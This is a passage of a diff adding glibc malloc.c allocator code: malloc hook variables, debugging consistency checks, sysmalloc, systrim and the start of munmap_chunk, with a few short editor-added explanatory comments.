+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+
+/* ---------------- Error behavior ------------------------------------ */
+
+#ifndef DEFAULT_CHECK_ACTION
+# define DEFAULT_CHECK_ACTION 3
+#endif
+
+static int check_action = DEFAULT_CHECK_ACTION;
+
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
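+
+/* Illustrative sketch (added; not compiled and not part of glibc):
+   perturb_byte is normally set from the MALLOC_PERTURB_ environment
+   variable or via mallopt (M_PERTURB, ...).  With a value of 0xaa,
+   freed memory is filled with 0xaa and freshly malloc'd memory with
+   0x55 (0xaa ^ 0xff), which makes use-after-free and uninitialised-read
+   bugs much easier to spot.  */
+#if 0
+#include <malloc.h>
+#include <stdlib.h>
+static void
+example_enable_perturb (void)
+{
+  mallopt (M_PERTURB, 0xaa);
+  char *p = malloc (16);   /* buffer now filled with 0x55              */
+  free (p);                /* buffer overwritten with 0xaa on free     */
+}
+#endif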
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (p) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* cannot run remaining checks until fully initialized */
+  if (av->top == 0 || av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  if (total != 0)
+    assert (have_fastchunks (av));
+  else if (!have_fastchunks (av))
+    assert (total == 0);
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+            {
+              /* Oops!  Someone else killed our space..  Can't touch anything.  */
+              malloc_printerr (3, "break adjusted to free malloc space", brk,
+			       av);
+            }
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     Note that if the second sbrk did NOT fail, we assume that space
+                     is contiguous with the first sbrk. This is a safe assumption unless
+                     the program is multithreaded but doesn't use locks and a foreign sbrk
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
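+                      /*
+                         Illustrative note (editor's addition, assuming a typical
+                         64-bit build with SIZE_SZ == 8): each fencepost advertises
+                         a size of 2 * SIZE_SZ == 16 bytes with PREV_INUSE set, so
+                         the pair occupies the 32 bytes carved off old_top above.
+                         Anything walking forward from old_top stops at these two
+                         "in use" 16-byte chunks and never consolidates into memory
+                         the arena does not own.
+                       */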
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
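+/*
+   Worked example (editor's illustration, not from the original source):
+   assuming a 4096-byte page, SIZE_SZ == 8 and MINSIZE == 0x20, a top chunk
+   of size 0x42010 with pad == 0x20000 gives top_area == 0x41fef and
+   extra == ALIGN_DOWN (0x21fef, 0x1000) == 0x21000, so 33 whole pages are
+   returned via MORECORE (-extra) while at least pad + MINSIZE bytes of top
+   are kept for future requests.
+ */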
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if the first call releases less than we asked,
+         or if a failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+internal_function
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least), so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    {
+      malloc_printerr (check_action, "munmap_chunk(): invalid pointer",
+                       chunk2mem (p), NULL);
+      return;
+    }
+
+  atomic_decrement (&mp_.n_mmaps);
